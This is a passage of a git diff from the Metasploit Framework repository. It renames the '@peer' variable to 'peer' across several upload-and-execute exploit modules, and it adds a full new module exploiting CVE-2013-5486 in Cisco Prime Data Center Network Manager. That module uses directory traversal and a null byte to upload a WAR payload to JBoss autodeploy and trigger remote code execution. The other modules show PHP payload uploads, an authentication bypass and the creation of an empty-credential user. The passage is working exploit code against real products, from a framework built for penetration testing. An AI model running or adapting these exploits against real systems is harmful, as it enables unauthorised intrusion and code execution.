'method' => 'POST', 'method' => 'POST',
@ -99,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "#{postdata}", 'data' => "#{postdata}",
}) })
if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/ if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/
print_error("#{@peer} - Authentication failed. Incorrect username/password.") print_error("#{peer} - Authentication failed. Incorrect username/password.")
return return
end end
print_status("#{@peer} - Sent payload successfully") print_status("#{peer} - Sent payload successfully")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
rescue rescue
print_error("#{@peer} - Sending payload failed") print_error("#{peer} - Sending payload failed")
end end
handler handler

10
modules/exploits/multi/http/auxilium_upload_exec.rb
View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
post_data = data.to_s post_data = data.to_s
post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...") print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"), 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res if not res
print_error("#{@peer} - No response from host") print_error("#{peer} - No response from host")
return return
end end
print_status("#{@peer} - Requesting '#{php_fname}'...") print_status("#{peer} - Requesting '#{php_fname}'...")
res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")}) res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
if res and res.code == 404 if res and res.code == 404
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}") print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
return return
end end
@ -103,8 +103,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/' uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.") base = File.dirname("#{uri}.")

153
modules/exploits/multi/http/cisco_dcnm_upload.rb Normal file
View File

@ -0,0 +1,153 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager. The
vulnerability exists in processImageSave.jsp, which can be abused through a directory
traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
application server feature is used to achieve remote code execution. This module has been
tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
(64 bits).
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-5486'],
[ 'OSVDB', '97426' ],
[ 'ZDI', '13-254' ],
[ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Cisco DCNM 6.1(2) / Java Universal',
{
'AutoDeployPath' => "../../../../../deploy",
'CleanupPath' => "../../jboss-4.2.2.GA/server/fm/deploy"
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 18 2013'))
register_options(
[
OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
], self.class)
end
def upload_file(location, filename, contents)
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
'method' => 'POST',
'encode_params' => false,
'vars_post' =>
{
"mode" => "save",
"savefile" => "true",
"chartid" => "#{location}/#{filename}%00",
"data" => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
}
})
if res and res.code == 200 and res.body.to_s =~ /success/
return true
else
return false
end
end
def check
version = ""
res = send_request_cgi({
'url' => target_uri.to_s,
'method' => 'GET'
})
unless res
return Exploit::CheckCode::Unknown
end
if res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/ and
res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
version = $1
print_status("Cisco Primer Data Center Network Manager version #{version} found")
elsif res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
if version =~ /6\.1/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
attempts = datastore['ATTEMPTS']
fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
app_base = rand_text_alphanumeric(4+rand(32-4))
# By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
# Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
# Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
war = payload.encoded_war({ :app_name => app_base }).to_s
war_filename = "#{app_base}.war"
war_location = target['AutoDeployPath']
print_status("#{peer} - Uploading WAR file #{war_filename}...")
res = upload_file(war_location, war_filename, war)
if res
register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
else
fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
end
attempts.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end

7
modules/exploits/multi/http/cuteflow_upload_exec.rb
View File

@ -99,20 +99,19 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
base = normalize_uri(target_uri.path) base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
# upload PHP payload to upload/___1/ # upload PHP payload to upload/___1/
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alphanumeric(rand(10)+6) + '.php' fname = rand_text_alphanumeric(rand(10)+6) + '.php'
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
res = upload(base, fname, php) res = upload(base, fname, php)
if res.nil? if res.nil?
print_error("#{@peer} - Uploading PHP payload failed") print_error("#{peer} - Uploading PHP payload failed")
return return
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Retrieving file: #{fname}") print_status("#{peer} - Retrieving file: #{fname}")
send_request_raw({ send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(base, "upload/___1/#{fname}") 'uri' => normalize_uri(base, "upload/___1/#{fname}")

38
modules/exploits/multi/http/extplorer_upload_exec.rb
View File

@ -135,22 +135,22 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path base = target_uri.path
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
@fname= rand_text_alphanumeric(rand(10)+6) + '.php' @fname= rand_text_alphanumeric(rand(10)+6) + '.php'
user = datastore['USERNAME'] user = datastore['USERNAME']
datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";" datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";"
# bypass auth # bypass auth
print_status("#{@peer} - Authenticating as user (#{user})") print_status("#{peer} - Authenticating as user (#{user})")
res = auth_bypass(base, user) res = auth_bypass(base, user)
if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/ if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/
print_status("#{@peer} - Authenticated successfully") print_status("#{peer} - Authenticated successfully")
else else
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed") fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end end
# search for writable directories # search for writable directories
print_status("#{@peer} - Retrieving writable subdirectories") print_status("#{peer} - Retrieving writable subdirectories")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -159,32 +159,32 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root", 'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root",
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/ if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/
dir = "#{base}#{$1}" dir = "#{base}#{$1}"
print_status("#{@peer} - Successfully retrieved writable subdirectory (#{$1})") print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})")
else else
dir = "#{base}" dir = "#{base}"
print_error("#{@peer} - Could not find a writable subdirectory.") print_error("#{peer} - Could not find a writable subdirectory.")
end end
# upload PHP payload # upload PHP payload
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
begin begin
res = upload(base, dir, @fname, php) res = upload(base, dir, @fname, php)
if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/ if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/
print_good("#{@peer} - File uploaded successfully") print_good("#{peer} - File uploaded successfully")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
# search directories in the web root for the file # search directories in the web root for the file
print_status("#{@peer} - Searching directories for file (#{@fname})") print_status("#{peer} - Searching directories for file (#{@fname})")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -193,27 +193,27 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => datastore['COOKIE'], 'cookie' => datastore['COOKIE'],
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/ if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/
dir = $1.gsub('\\','') dir = $1.gsub('\\','')
print_good("#{@peer} - Successfully found file") print_good("#{peer} - Successfully found file")
else else
print_error("#{@peer} - Failed to find file") print_error("#{peer} - Failed to find file")
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (/#{dir}/#{@fname})") print_status("#{peer} - Executing payload (/#{dir}/#{@fname})")
begin begin
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => "/#{dir}/#{@fname}" 'uri' => "/#{dir}/#{@fname}"
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
if res and res.code != 200 if res and res.code != 200
print_error("#{@peer} - Executing payload failed") print_error("#{peer} - Executing payload failed")
end end
end end
end end

29
modules/exploits/multi/http/glossword_upload_exec.rb
View File

@ -124,38 +124,37 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
base = target_uri.path base = target_uri.path
@peer = "#{rhost}:#{rport}"
@fname= rand_text_alphanumeric(rand(10)+6) + '.php' @fname= rand_text_alphanumeric(rand(10)+6) + '.php'
user = datastore['USERNAME'] user = datastore['USERNAME']
pass = datastore['PASSWORD'] pass = datastore['PASSWORD']
# login; get session id and token # login; get session id and token
print_status("#{@peer} - Authenticating as user '#{user}'") print_status("#{peer} - Authenticating as user '#{user}'")
res = login(base, user, pass) res = login(base, user, pass)
if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
token = "#{$1}" token = "#{$1}"
sid = "#{$2}" sid = "#{$2}"
print_good("#{@peer} - Authenticated successfully") print_good("#{peer} - Authenticated successfully")
else else
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed") fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end end
# upload PHP payload # upload PHP payload
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
begin begin
res = upload(base, sid, @fname, php) res = upload(base, sid, @fname, php)
if res and res.code == 301 and res['location'] =~ /Setting saved/ if res and res.code == 301 and res['location'] =~ /Setting saved/
print_good("#{@peer} - File uploaded successfully") print_good("#{peer} - File uploaded successfully")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
# retrieve PHP file path # retrieve PHP file path
print_status("#{@peer} - Locating PHP payload file") print_status("#{peer} - Locating PHP payload file")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
@ -163,28 +162,28 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => "sid#{token}=#{sid}" 'cookie' => "sid#{token}=#{sid}"
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/ if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/
shell_uri = "#{$1}" shell_uri = "#{$1}"
@fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)') @fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)')
print_good("#{@peer} - Found payload file path (#{shell_uri})") print_good("#{peer} - Found payload file path (#{shell_uri})")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Failed to find PHP payload file path") fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path")
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (#{shell_uri})") print_status("#{peer} - Executing payload (#{shell_uri})")
begin begin
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(base, shell_uri), 'uri' => normalize_uri(base, shell_uri),
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
if !res or res.code != 200 if !res or res.code != 200
fail_with(Failure::UnexpectedReply, "#{@peer} - Executing payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Executing payload failed")
end end
end end
end end

29
modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
View File

@ -84,20 +84,19 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
# Create user with empty credentials # Create user with empty credentials
print_status("#{@peer} - Creating user with empty credentials") print_status("#{peer} - Creating user with empty credentials")
if create_user.nil? if create_user.nil?
print_error("#{@peer} - Failed to create user") print_error("#{peer} - Failed to create user")
return return
end end
# Generate an initial JSESSIONID # Generate an initial JSESSIONID
print_status("#{@peer} - Retrieving an initial JSESSIONID") print_status("#{peer} - Retrieving an initial JSESSIONID")
res = send_request_cgi( res = send_request_cgi(
'uri' => normalize_uri(@uri, 'servlet/Main'), 'uri' => normalize_uri(@uri, 'servlet/Main'),
'method' => 'POST' 'method' => 'POST'
@ -106,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/ if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
session_id = $1 session_id = $1
else else
print_error("#{@peer} - Retrieve of initial JSESSIONID failed") print_error("#{peer} - Retrieve of initial JSESSIONID failed")
return return
end end
# Authenticate # Authenticate
login_data = "j_username=&j_password=" login_data = "j_username=&j_password="
print_status("#{@peer} - Authenticating on HP SiteScope Configuration") print_status("#{peer} - Authenticating on HP SiteScope Configuration")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => normalize_uri(@uri, 'j_security_check'), 'uri' => normalize_uri(@uri, 'j_security_check'),
@ -130,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote
session_id = $1 session_id = $1
redirect = URI(res.headers['Location']).path redirect = URI(res.headers['Location']).path
else else
print_error("#{@peer} - Authentication on SiteScope failed") print_error("#{peer} - Authentication on SiteScope failed")
return return
end end
# Follow redirection to complete authentication process # Follow redirection to complete authentication process
print_status("#{@peer} - Following redirection to finish authentication") print_status("#{peer} - Following redirection to finish authentication")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => redirect, 'uri' => redirect,
@ -147,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 200 if not res or res.code != 200
print_error("#{@peer} - Authentication on SiteScope failed") print_error("#{peer} - Authentication on SiteScope failed")
return return
end end
@ -235,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
traversal = "..\\..\\..\\..\\..\\..\\" traversal = "..\\..\\..\\..\\..\\..\\"
end end
print_status("#{@peer} - Uploading the payload") print_status("#{peer} - Uploading the payload")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true", 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true",
@ -250,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
path = $1 path = $1
print_good("#{@peer} - Payload successfully uploaded to #{path}") print_good("#{peer} - Payload successfully uploaded to #{path}")
else else
print_error("#{@peer} - Error uploading the Payload") print_error("#{peer} - Error uploading the Payload")
return return
end end
post_data = Rex::MIME::Message.new post_data = Rex::MIME::Message.new
post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"") post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
print_status("#{@peer} - Uploading the JSP") print_status("#{peer} - Uploading the JSP")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", 'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
@ -274,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
path = $1 path = $1
print_good("#{@peer} - JSP successfully uploaded to #{path}") print_good("#{peer} - JSP successfully uploaded to #{path}")
else else
print_error("#{@peer} - Error uploading the JSP") print_error("#{peer} - Error uploading the JSP")
return return
end end

13
modules/exploits/multi/http/kordil_edms_upload_exec.rb
View File

@ -101,32 +101,31 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
base = target_uri.path base = target_uri.path
@peer = "#{rhost}:#{rport}"
@fname = rand_text_numeric(7) @fname = rand_text_numeric(7)
# upload PHP payload to userpictures/[fname].php # upload PHP payload to userpictures/[fname].php
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
begin begin
res = upload(base, php) res = upload(base, php)
if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/ if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/
print_good("#{@peer} - File uploaded successfully") print_good("#{peer} - File uploaded successfully")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)") print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(base, 'userpictures', "#{@fname}.php") 'uri' => normalize_uri(base, 'userpictures', "#{@fname}.php")
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
end end

8
modules/exploits/multi/http/mobilecartly_upload_exec.rb
View File

@ -72,8 +72,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
# #
# Init target path # Init target path
# #
@ -89,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Upload payload # Upload payload
# #
print_status("#{@peer} - Uploading payload") print_status("#{peer} - Uploading payload")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(base, "/includes/savepage.php"), 'uri' => normalize_uri(base, "/includes/savepage.php"),
'vars_get' => { 'vars_get' => {
@ -99,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res if not res
print_error("#{@peer} - No response from server, will not continue.") print_error("#{peer} - No response from server, will not continue.")
return return
end end
# #
# Run payload # Run payload
# #
print_status("#{@peer} - Requesting '#{php_fname}'") print_status("#{peer} - Requesting '#{php_fname}'")
send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) }) send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
handler handler

6
modules/exploits/multi/http/movabletype_upgrade_exec.rb
View File

@ -69,9 +69,8 @@ class Metasploit4 < Msf::Exploit::Remote
end end
def check def check
@peer = "#{rhost}:#{rport}"
fingerprint = rand_text_alpha(5) fingerprint = rand_text_alpha(5)
print_status("#{@peer} - Sending check...") print_status("#{peer} - Sending check...")
begin begin
res = http_send_raw(fingerprint) res = http_send_raw(fingerprint)
rescue Rex::ConnectionError rescue Rex::ConnectionError
@ -91,8 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Sending payload...")
print_status("#{@peer} - Sending payload...")
http_send_cmd(payload.encoded) http_send_cmd(payload.encoded)
end end

24
modules/exploits/multi/http/php_volunteer_upload_exec.rb
View File

@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
# If we don't get a cookie, bail! # If we don't get a cookie, bail!
if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/ if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/
cookie = $1 cookie = $1
vprint_status("#{@peer} - Found cookie: #{cookie}") vprint_status("#{peer} - Found cookie: #{cookie}")
else else
return nil return nil
end end
@ -189,56 +189,54 @@ class Metasploit3 < Msf::Exploit::Remote
base = normalize_uri(target_uri.path) base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
# Login # Login
username = datastore['USERNAME'] username = datastore['USERNAME']
password = datastore['PASSWORD'] password = datastore['PASSWORD']
cookie = login(base, username, password) cookie = login(base, username, password)
if cookie.nil? if cookie.nil?
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"") print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
return return
end end
print_status("#{@peer} - Login successful with #{username}:#{password}") print_status("#{peer} - Login successful with #{username}:#{password}")
# Take a snapshot of the uploads directory # Take a snapshot of the uploads directory
# Viewing this doesn't actually require the user to login first, # Viewing this doesn't actually require the user to login first,
# but we supply the cookie anyway to act more like a real user. # but we supply the cookie anyway to act more like a real user.
print_status("#{@peer} - Enumerating all the uploads...") print_status("#{peer} - Enumerating all the uploads...")
before = peek_uploads(base, cookie) before = peek_uploads(base, cookie)
if before.nil? if before.nil?
print_error("#{@peer} - Unable to enumerate original uploads") print_error("#{peer} - Unable to enumerate original uploads")
return return
end end
# Upload our PHP shell # Upload our PHP shell
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alpha(rand(10)+6) + '.php' fname = rand_text_alpha(rand(10)+6) + '.php'
desc = rand_text_alpha(rand(10)+5) desc = rand_text_alpha(rand(10)+5)
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
res = upload(base, cookie, fname, php, desc) res = upload(base, cookie, fname, php, desc)
if res.nil? or res.body !~ /The file was successfuly uploaded/ if res.nil? or res.body !~ /The file was successfuly uploaded/
print_error("#{@peer} - Failed to upload our file") print_error("#{peer} - Failed to upload our file")
return return
end end
# Now that we've uploaded our shell, let's take another snapshot # Now that we've uploaded our shell, let's take another snapshot
# of the uploads directory. # of the uploads directory.
print_status("#{@peer} - Enumerating new uploads...") print_status("#{peer} - Enumerating new uploads...")
after = peek_uploads(base, cookie) after = peek_uploads(base, cookie)
if after.nil? if after.nil?
print_error("#{@peer} - Unable to enumerate latest uploads") print_error("#{peer} - Unable to enumerate latest uploads")
return return
end end
# Find the filename of our uploaded shell # Find the filename of our uploaded shell
files = get_my_file(before.body, after.body) files = get_my_file(before.body, after.body)
if files.empty? if files.empty?
print_error("#{@peer} - No new file(s) found. The upload probably failed.") print_error("#{peer} - No new file(s) found. The upload probably failed.")
return return
else else
vprint_status("#{@peer} - Found these new files: #{files.inspect}") vprint_status("#{peer} - Found these new files: #{files.inspect}")
end end
# There might be more than 1 new file, at least execute the first 10 # There might be more than 1 new file, at least execute the first 10

26
modules/exploits/multi/http/qdpm_upload_exec.rb
View File

